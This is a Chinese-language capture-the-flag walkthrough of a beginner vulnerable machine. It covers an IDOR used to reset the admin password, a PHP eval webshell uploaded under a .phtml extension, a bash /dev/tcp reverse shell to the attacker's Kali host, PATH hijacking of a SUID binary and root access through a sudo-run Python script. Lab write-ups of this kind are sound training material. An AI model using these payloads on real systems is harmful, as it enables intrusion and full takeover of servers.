目錄
- 1、靶機概述
- 2、資訊收集
- 3、越權操作
- 4、檔案上傳獲取shell
- 5、反彈shell至kali
- 6、獲取john用戶shell
- 7、獲取root權限
1、靶機概述
Description
Difficulty: Easy
It’s a box for beginners, but not easy, Good Luck
Hint: Don’t waste your time For Brute-Force
鏈接: 靶機下載地址.
KALI:192.168.110.128
靶機:192.168.110.136
2、資訊收集
首先把靶機的IP給掃出來

接著掃描一波埠和服務

靶機開啟22和80埠,毫無疑問,先訪問一下80埠,顯示為一個站點,

查看頁面和審計頁面原始碼,并沒有發現關鍵資訊,
點擊login,進入登錄頁面

靶機描述中已經告訴我們不要使用暴力破解,不過可以注冊一個賬號,點擊sign up now,然后注冊一個賬號(test01:123456),
注冊成功后,登錄進去系統,

僅有更新個人資訊和密碼功能,
3、越權操作
更新一下密碼,并使用BP抓包,

嘗試是否存在越權操作漏洞,修改引數id=1

事實證明,存在越權操作漏洞,且我們已經修改了id=1的賬戶(admin)的密碼為111111,
使用管理員賬戶(admin:111111)登錄系統,多了一個檔案上傳功能,

4、檔案上傳獲取shell
首先上傳一個php檔案,內容為
<?php @eval($_POST[cmd]);?)>
但是報錯了,猜測做了黑名單檢測,

將后綴名改為.phtml,再次上傳,上傳成功,且暴露了上傳路徑,

使用蟻劍連接,獲取到shell

5、反彈shell至kali
下一步,我們反彈shell至kali
新建檔案xxx.sh,并賦予執行權限,內容為
#!/bin/bash
bash -i >& /dev/tcp/192.168.110.128/7788 0>&1
kali上開啟nc監聽,在蟻劍終端執行xxx.sh,反彈shell成功,

目前,我們獲得的權限還比較低,下一步,開始提權
查看/etc/passwd,可知,我們要先提權到john或darkhole

在/var/www/html/config目錄下存在資料庫連接檔案

在/home/john目錄下發現toto二進制檔案具有s權限

這個toto檔案是"id"的副本檔案,運行發現toto檔案的結果是用john的身份執行了id命令

6、獲取john用戶shell
我們可以嘗試利用這個特性,在本地編輯新的id檔案,寫入/bin/bash,給執行權限,然后將檔案路徑寫入到原有環境變數前(從前往后順序匹配),這樣使用id命令時就會優先匹配此路徑下的id檔案,運行toto檔案使用john身份呼叫id命令時就會獲得shell
echo '/bin/bash' > /tmp/id;chmod +x /tmp/id;export PATH=/tmp:$PATH

在user.txt中找到flag,在password中找到密碼root123

登錄john賬戶

7、獲取root權限
下一步,就是提權到root,首先搜一下具有sodo權限的命令

用戶可以編輯并執行root權限的python 腳本,
那我們將獲取shell的命令加入到python腳本中再去執行就可以獲得root權限了
echo 'import os;os.system("/bin/bash")' > file.py
sudo python3 /home/john/file.py

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/376955.html
標籤:其他
上一篇:永恒之藍漏洞發現與利用
